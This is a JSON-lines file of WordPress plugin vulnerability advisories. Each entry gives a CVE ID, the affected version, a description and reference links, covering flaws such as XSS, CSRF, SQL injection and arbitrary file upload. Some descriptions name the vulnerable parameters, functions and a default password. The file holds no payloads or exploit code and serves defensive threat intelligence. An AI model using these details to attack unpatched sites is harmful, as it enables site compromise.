{"CVE_ID":"CVE-2025-6550","slug":"the-pack-addon","versionImpact":"2.1.3","description":"The The Pack Elementor addon plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018slider_options\u2019 parameter in all versions up to, and including, 2.1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-pack-addon\\\/trunk\\\/includes\\\/widgets\\\/element\\\/carousel_parallax\\\/view.php#L25\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-pack-addon\\\/trunk\\\/includes\\\/widgets\\\/element\\\/carousel_parallax\\\/view.php#L25\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-pack-addon\\\/trunk\\\/includes\\\/widgets\\\/element\\\/imgbox_1\\\/view.php#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-pack-addon\\\/trunk\\\/includes\\\/widgets\\\/element\\\/imgbox_1\\\/view.php#L31\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-pack-addon\\\/trunk\\\/includes\\\/widgets\\\/element\\\/imgbox_4\\\/view.php#L57\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-pack-addon\\\/trunk\\\/includes\\\/widgets\\\/element\\\/imgbox_4\\\/view.php#L57\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-pack-addon\\\/trunk\\\/includes\\\/widgets\\\/element\\\/sliderparallax\\\/view.php#L37\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-pack-addon\\\/trunk\\\/includes\\\/widgets\\\/element\\\/sliderparallax\\\/view.php#L37\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-pack-addon\\\/trunk\\\/includes\\\/widgets\\\/element\\\/testimonial_1\\\/one.php#L46\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-pack-addon\\\/trunk\\\/includes\\\/widgets\\\/element\\\/testimonial_1\\\/one.php#L46\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-pack-addon\\\/trunk\\\/includes\\\/widgets\\\/element\\\/testimonial_5\\\/one.php#L33\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-pack-addon\\\/trunk\\\/includes\\\/widgets\\\/element\\\/testimonial_5\\\/one.php#L33\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4af2f136-5806-4d5e-a72d-486c4839a695?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4af2f136-5806-4d5e-a72d-486c4839a695?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7022","slug":"my-reservation-system","versionImpact":"2.3","description":"The My Reservation System WordPress plugin through 2.3 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c1021763-075b-40c7-801d-b5519828aabe\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c1021763-075b-40c7-801d-b5519828aabe\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c1021763-075b-40c7-801d-b5519828aabe\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c1021763-075b-40c7-801d-b5519828aabe\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0728","slug":"wicked-folders","versionImpact":"2.18.16","description":"The Wicked Folders plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.18.16. This is due to missing or incorrect nonce validation on the ajax_save_folder function. This makes it possible for unauthenticated attackers to invoke this function via forged request granted they can trick a site administrator into performing an action such as clicking on a link leading them to perform actions intended for administrators such as changing the folder structure maintained by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43b43802-f301-4748-98b9-eea78a249355\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43b43802-f301-4748-98b9-eea78a249355\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0695","slug":"metform","versionImpact":"3.3.0","description":"The Metform Elementor Contact Form Builder for WordPress is vulnerable to Cross-Site Scripting by using the 'mf' shortcode to echo unescaped form submissions in versions up to, and including, 3.3.0. This allows authenticated attackers, with contributor-level permissions or above, to inject arbitrary web scripts in pages that will execute when the victim visits a specific link. Note that getting the JavaScript to execute still requires user interaction as the victim must visit a crafted link with the form entry id, but the script itself is stored in the site database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/base\\\/shortcode.php?rev=2845078\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/base\\\/shortcode.php?rev=2845078\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c866d8d-399c-4bda-a3c9-17c7e5d2ffb8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c866d8d-399c-4bda-a3c9-17c7e5d2ffb8?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3041","slug":"auyautochat-for-wp","versionImpact":"1.1.7","description":"The Autochat Automatic Conversation WordPress plugin through 1.1.7 does not sanitise and escape user input before outputting it back on the page, leading to a cross-site Scripting attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/93cad990-b6be-4ee1-9cdf-0211a7fe6c96\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/93cad990-b6be-4ee1-9cdf-0211a7fe6c96\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-41131","slug":"spotify-play-button-for-wordpress","versionImpact":"2.10","description":"Cross-Site Request Forgery (CSRF) vulnerability in Jonk @ Follow me Darling Sp*tify Play Button for WordPress plugin <=\u00a02.10 versions.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/spotify-play-button-for-wordpress\\\/wordpress-sp-tify-play-button-for-wordpress-plugin-2-10-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/spotify-play-button-for-wordpress\\\/wordpress-sp-tify-play-button-for-wordpress-plugin-2-10-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1448","slug":"sassy-social-share","versionImpact":"3.3.56","description":"The Social Sharing Plugin \u2013 Sassy Social Share plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 3.3.56 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c2f4b74-2568-4e5a-b55f-0130096bc19f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c2f4b74-2568-4e5a-b55f-0130096bc19f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sassy-social-share\\\/tags\\\/3.3.56\\\/includes\\\/class-sassy-social-share-shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sassy-social-share\\\/tags\\\/3.3.56\\\/includes\\\/class-sassy-social-share-shortcodes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3038227%40sassy-social-share%2Ftrunk&old=2996153%40sassy-social-share%2Ftrunk&sfp_email=&sfph_mail=#file8\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3038227%40sassy-social-share%2Ftrunk&old=2996153%40sassy-social-share%2Ftrunk&sfp_email=&sfph_mail=#file8\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0700","slug":"simple-tweet","versionImpact":"1.4.0.2","description":"The Simple Tweet plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Tweet this text value in all versions up to, and including, 1.4.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5da021c-3835-4251-a3e5-3b5aaa11ea14?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5da021c-3835-4251-a3e5-3b5aaa11ea14?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wTeBwAA\\\/PoC-SimpleTweet\\\/blob\\\/main\\\/POST-request\",\"name\":\"https:\\\/\\\/github.com\\\/wTeBwAA\\\/PoC-SimpleTweet\\\/blob\\\/main\\\/POST-request\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-tweet\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-tweet\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2273","slug":"kadence-blocks","versionImpact":"3.2.34","description":"The Gutenberg Blocks by Kadence Blocks \u2013 Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several parameters in all versions up to, and including, 3.2.34 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e7fe482e-a4e8-411c-97a4-a32ccf5b3682?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e7fe482e-a4e8-411c-97a4-a32ccf5b3682?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3075158%40kadence-blocks%2Ftrunk&old=3068562%40kadence-blocks%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3075158%40kadence-blocks%2Ftrunk&old=3068562%40kadence-blocks%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4616","slug":"wp-widget-bundle","versionImpact":"2.0.0","description":"The Widget Bundle WordPress plugin through 2.0.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against only unauthenticated users","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d203bf3b-aee9-4755-b429-d6bbdd940890\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d203bf3b-aee9-4755-b429-d6bbdd940890\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7648","slug":"opal-membership","versionImpact":"1.2.4","description":"The Opal Membership plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.2.4 via the private notes functionality on payments which utilizes WordPress comments. This makes it possible for authenticated attackers, with subscriber-level access and above, to view private notes via recent comments that should be restricted to just administrators.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3098565-d037-4a31-af3c-00e8b93b922e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3098565-d037-4a31-af3c-00e8b93b922e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/opal-membership\\\/trunk\\\/inc\\\/class-opalmembership-ajax.php#L128\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/opal-membership\\\/trunk\\\/inc\\\/class-opalmembership-ajax.php#L128\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/opal-membership\\\/trunk\\\/inc\\\/mixes-functions.php#L154\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/opal-membership\\\/trunk\\\/inc\\\/mixes-functions.php#L154\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8543","slug":"slider-comparison-image-before-and-after","versionImpact":"0.8.3","description":"The Slider comparison image before and after plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's [sciba] shortcode in all versions up to, and including, 0.8.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/14ab5d7c-ab46-4a53-b0d2-8b331e204cf3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/14ab5d7c-ab46-4a53-b0d2-8b331e204cf3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slider-comparison-image-before-and-after\\\/trunk\\\/sciba.php#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slider-comparison-image-before-and-after\\\/trunk\\\/sciba.php#L39\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12595","slug":"ahathat","versionImpact":"1.6","description":"The AHAthat Plugin WordPress plugin through 1.6 does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute, which could lead to Reflected Cross-Site Scripting in old web browsers","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7a506438-3106-477f-816d-b9b116ec8555\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7a506438-3106-477f-816d-b9b116ec8555\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-22762","slug":"octrace-support","versionImpact":"1.2.7","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Octrace Studio WordPress HelpDesk & Support Ticket System Plugin \u2013 Octrace Support allows Stored XSS.This issue affects WordPress HelpDesk & Support Ticket System Plugin \u2013 Octrace Support: from n\/a through 1.2.7.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/octrace-support\\\/vulnerability\\\/wordpress-octrace-support-pro-plugin-1-2-7-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/octrace-support\\\/vulnerability\\\/wordpress-octrace-support-pro-plugin-1-2-7-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12638","slug":"bulk-me-now","versionImpact":"2.0","description":"The Bulk Me Now! WordPress plugin through 2.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a6f5b0fe-00a0-4e30-aec6-87882c035beb\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a6f5b0fe-00a0-4e30-aec6-87882c035beb\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a6f5b0fe-00a0-4e30-aec6-87882c035beb\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a6f5b0fe-00a0-4e30-aec6-87882c035beb\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0512","slug":"structured-content","versionImpact":"6.4.5","description":"The Structured Content (JSON-LD) #wpsc plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's sc_fs_local_business shortcode in all versions up to, and including, 6.4.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/structured-content\\\/trunk\\\/templates\\\/shortcodes\\\/local-business.php#L10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/structured-content\\\/trunk\\\/templates\\\/shortcodes\\\/local-business.php#L10\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3248930\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3248930\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/structured-content\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/structured-content\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ac5fe69-7885-4fb7-8107-079216d6955e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ac5fe69-7885-4fb7-8107-079216d6955e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2478","slug":"code-clone","versionImpact":"0.9","description":"The Code Clone plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018snippetId\u2019 parameter in all versions up to, and including, 0.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/code-clone\\\/trunk\\\/admin\\\/snippet-edit.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/code-clone\\\/trunk\\\/admin\\\/snippet-edit.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/code-clone\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/code-clone\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9b6f21ce-8601-425f-bd44-6a1af31c67de?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9b6f21ce-8601-425f-bd44-6a1af31c67de?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5058","slug":"store-manager-connector","versionImpact":"1.2.5","description":"The eMagicOne Store Manager for WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the set_image() function in all versions up to, and including, 1.2.5. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. This is only exploitable by unauthenticated attackers in default configurations where the the default password is left as 1:1, or where the attacker gains access to the credentials.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/d0n601\\\/CVE-2025-5058\\\/\",\"name\":\"https:\\\/\\\/github.com\\\/d0n601\\\/CVE-2025-5058\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-manager-connector\\\/trunk\\\/classes\\\/class-emosmconnectorcommon.php#L2115\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-manager-connector\\\/trunk\\\/classes\\\/class-emosmconnectorcommon.php#L2115\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-manager-connector\\\/trunk\\\/classes\\\/class-emosmcwoocommerceoverrider.php#L272\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-manager-connector\\\/trunk\\\/classes\\\/class-emosmcwoocommerceoverrider.php#L272\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/ryankozak.com\\\/posts\\\/cve-2025-5058\\\/\",\"name\":\"https:\\\/\\\/ryankozak.com\\\/posts\\\/cve-2025-5058\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a00ece0-6644-4535-86aa-d0802d94a1a7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a00ece0-6644-4535-86aa-d0802d94a1a7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5940","slug":"osomblocks","versionImpact":"1.2.1","description":"The Osom Blocks \u2013 Custom Post Type listing block plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018class_name\u2019 parameter in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/osomblocks\\\/trunk\\\/blocks\\\/cpt-list\\\/index.php#L171\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/osomblocks\\\/trunk\\\/blocks\\\/cpt-list\\\/index.php#L171\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/osomblocks\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/osomblocks\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/54e022df-0dc7-4f60-811d-48a92b723d55?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/54e022df-0dc7-4f60-811d-48a92b723d55?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0713","slug":"wicked-folders","versionImpact":"2.18.16","description":"The Wicked Folders plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the ajax_add_folder function in versions up to, and including, 2.18.16. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to invoke this function and perform actions intended for administrators such as modifying the folder structure maintained by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2764b360-228d-48c1-8a29-d3764e532799\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2764b360-228d-48c1-8a29-d3764e532799\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0694","slug":"metform","versionImpact":"3.3.1","description":"The Metform Elementor Contact Form Builder for WordPress is vulnerable to Information Disclosure via the 'mf' shortcode in versions up to, and including, 3.3.1. This allows authenticated attackers, with subscriber-level capabilities or above to obtain sensitive information about any standard form field of any form submission.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/base\\\/shortcode.php?rev=2845078\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/base\\\/shortcode.php?rev=2845078\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2910040\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2910040\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a8b194c-371f-4adc-98fa-8f4e47a38ee7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a8b194c-371f-4adc-98fa-8f4e47a38ee7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
